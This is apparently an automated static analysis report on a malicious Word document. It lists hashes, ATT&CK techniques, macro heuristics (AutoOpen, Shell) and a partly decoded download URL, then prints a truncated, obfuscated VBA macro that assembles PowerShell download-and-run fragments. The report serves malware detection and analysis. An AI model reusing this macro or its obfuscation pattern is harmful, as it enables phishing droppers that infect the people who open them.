Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b18f42e2e1543973…

MALICIOUS

Office (OLE)

89.5 KB Created: 2018-02-16 06:49:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: f369c135565d0db69583ea360b0ff530 SHA-1: 8bc7760f66b4071a031c58359b37a5fb653ca2a6 SHA-256: b18f42e2e1543973d300428a971dd595b89b77774975cb1a1c646888a80634b6
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within its VBA macros. An AutoOpen macro is also present, so the code runs automatically when the document is opened. The script attempts to construct a URL, likely for downloading a secondary payload, which is a common malware delivery technique. The reconstructed URL is 'http://wwwhNf+hNf.abhNf+hNfcthNMlTdjVqndkXiLZYcJXiJET'. Note that this string still contains the 'hNf+hNf' filler tokens used by the macro's string-concatenation obfuscation (visible in the extracted source below), so it is a partially decoded fragment rather than a final download address.

Heuristics (6)

  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://wwwhNf+hNf.abhNf+hNfcthNMlTdjVqndkXiLZYcJXiJET (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23726 bytes
SHA-256: e03714f4d81303daa3222232fc4d1741f4a01d50fcb59e9a63e52c16d000779d
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mAjSIzYJ"
Function LAUNaDrsGllwSL()
On Error Resume Next
NFpKibcNRGu = 2440533 / CLng(QVrbRNNKA) - 2432151 * Cos(2665667) + aLoiQokRlETA + 9731133
jZXNGc = 5616795 / CLng(lDhtRzA) - 3187965 * Cos(3151728) + irqCwFCm + 8336284
HDiiTRqz = 1793812 / CLng(jOzEwvjLBqc) - 7736159 * Cos(433898) + GSTwkZuYSi + 9438936
tZuzk = (zbjrYwOsj) + HJjkJKD("HoFuVCabX+abXE(([cHar]6abX+abX6+vqP+vqP[c'+'HavqP+vqPr]88+[cHar]'+'51),[StRIng][cvqP+vqPHarabX+abX]34)ZJKBCL", 6, 98)
DHvuRai = 5114993 / CLng(njpGjlLwOGEfv) - 2419280 * Cos(7022724) + VUXZRhddjJ + 7982592
ZrMkz = 1833676 / CLng(dtGowLhYAktqt) - 4235227 * Cos(6603595) + ZVsizjj + 3257689
VpoBDaVu = 226827 / CLng(FFMaawBDk) - 2597171 * Cos(9616386) + wACDUkdiXLvPH + 7670664
ihZPZXlliO = (QEOZFDn) + HJjkJKD("amXjMGNfsd.nexthNf+hNf(1000hvqP+vqPNf'+'+hNf0,hNf+hNf hNf+hNf2hNf+hNfabX'+'+abX82vqP+vqP13hNf+h'+'Nf3)h'+'Nf+'+'hvqP+vqPNf;RSxADCXhNf+abX+abXhNf = hNf+VDnjImrnSEjthqchXXRLYEIMDhcDEJ", 7, 145)
rjGAT = 8780579 / CLng(zTmzWH) - 8224081 * Cos(632999) + DVuaru + 5098493
DqwlkP = 6297983 / CLng(haawYOFDCfLCV) - 5049646 * Cos(2382619) + OHWzSiuR + 1498040
jiiQmfwImkM = 5965865 / CLng(wABUY) - 1247618 * Cos(4655596) + SjwuXtSF + 2151540
CnaYBNIdoXW = (lUQiYrbtOznSA) + HJjkJKD("DBbBOVzDwlLWOlz+hvqP+abX+abXvqPNf&hNf+hN'+'f(vqP+vqPOf'+'JnOfJ+OfJhNf+hNfeOhNf+hNffJtOIXAkTOMOGiDHRjLvR", 16, 69)
icsicma = 2460683 / CLng(EzcjZBzHNtYjVX) - 9238858 * Cos(3594400) + ZHAMkPFzFKkn + 7893149
QMDaaOfk = 4729973 / CLng(aEicXzj) - 7972462 * Cos(9380532) + vJbiR + 4692848
UppQvtbWBqa = 196184 / CLng(HJIMnTjWjTrM) - 3902348 * Cos(4779183) + LGQsTvpp + 3451713
JwsiqCrzR = (tLJCALmvzHtjQ) + HJjkJKD("pCczmoGvVizOkIEpBRCjZhNf).REplaCE(hNf5m'+'oZYSwGnMcAZlEGlRC", 22, 21)
LbYtr = 9629538 / CLng(jWpQYAfhtRTq) - 1674190 * Cos(5944732) + dsOfFcVqFH + 8411807
wndMcz = 9934446 / CLng(aubZTTYSQNv) - 7601450 * Cos(1157695) + EQvNF + 7344024
bfGziHzjhR = 6148082 / CLng(HzksINf) - 6957596 * Cos(1721165) + BwHzqtWpGMN + 5938499
XONsYAoT = (ljwhPEORKtANQ) + HJjkJKD("vHCjmQRIPYwNCNfabX+abX+hNf+hNf+hNfOfJwhNfabX+'+'abX+hNfOfJ+OfJ-ohNabX+abXf+hNfbjevqP+vqPcthNf+hNfOfJabX+abXhNf+hNf) hNf+hNfShNf+h'+'NfyshNfCLCR", 14, 126)
lnjiP = 6156959 / CLng(OmHuF) - 4886576 * Cos(320014) + PjTBcjsthwEaP + 9035801
htcwhjFYH = 7608680 / CLng(wMOEvivZhZEFrj) - 2246263 * Cos(279115) + CWhiJJ + 9268395
TjhZvRhi = 9268716 / CLng(dOhFpTwKztL) - 9396117 * Cos(9137387) + ltTDbnBBkDSN + 4768861
KqfwdiSMjQz = (BKmcpbLLm) + HJjkJKD("ZalQiKvOlBbX+ab'+'X(OfJ.exOhNfiwEKA", 11, 20)
UdzANfwY = 6699462 / CLng(qLGkwopG) - 3923056 * Cos(1695762) + cdinbuswJqs + 7740943
TzwSV = 6582497 / CLng(EBrSrjUSSMGG) - 7721568 * Cos(1891290) + wvzzjYCNo + 1668995
IOVwa = 8034562 / CLng(kZbzXYA) - 8396784 * Cos(7612266) + odbMJLRjVGiWLv + 9083649
TathQaQSBnM = (jsbkkGj) + HJjkJKD("okGtNQERhTiIjMwaiQhpjNEiAWibhNf+hNfOUhNvqP+vqPf+hNfOfhNf+hNfJhabX+abXNf+hNf + '+'RSh'+'Nf+hNfxNhNf+KYR", 28, 72)
ZLZKJw = 1437832 / CLng(jiNNjCiWopzu) - 5901460 * Cos(5359454) + cPUCzn + 3585327
DounQhTb = 3222256 / CLng(KoaQhvKsvWSo) - 4408478 * Cos(6087052) + NALzcm + 1238103
MjfFZHKdJjF = 5442568 / CLng(PrzWtKAQOcCsb) - 3464144 * Cos(7859525) + iHwIJUFkKowbT + 7734817
tEhQvMhBwOD = (ioSlAGUXUPrv) + HJjkJKD("TIfZkRSFWvUfJOucJjiDTTjFHTLwicFRhNfSB + hNf+hNabX+abXf'+'a'+'czQhlqc", 33, 29)
izbItiwLM = 8940005 / CLng(PLFNYzZdwftQ) - 9795469 * Cos(9267356) + JMmHuKHsCNFMq + 3832798
AddKRHJGatr = 9253244 / CLng(zHDjctXzEARim) - 8597944 * Cos(3573024) + KHVvhbAcH + 3736618
NiiBjba = 444975 / CLng(TljJC) - 7659519 * Cos(8881053) + vPNPop + 606642
hYuMUH = (liWHziITj) + HJjkJKD("QjbCviAGDAuWn+hNfnsadahNf+hrCD", 14, 14)
MIkzVGLkI = 1787847 / CLng(vtGHsYGiiN) - 8524074 * Cos(1152157) + kALCdWCUqEYR + 2270224
wNNwDsTnFFo = 6908159 / CLng(mBHLlFFpst) - 3521458 * Cos(990
... (truncated)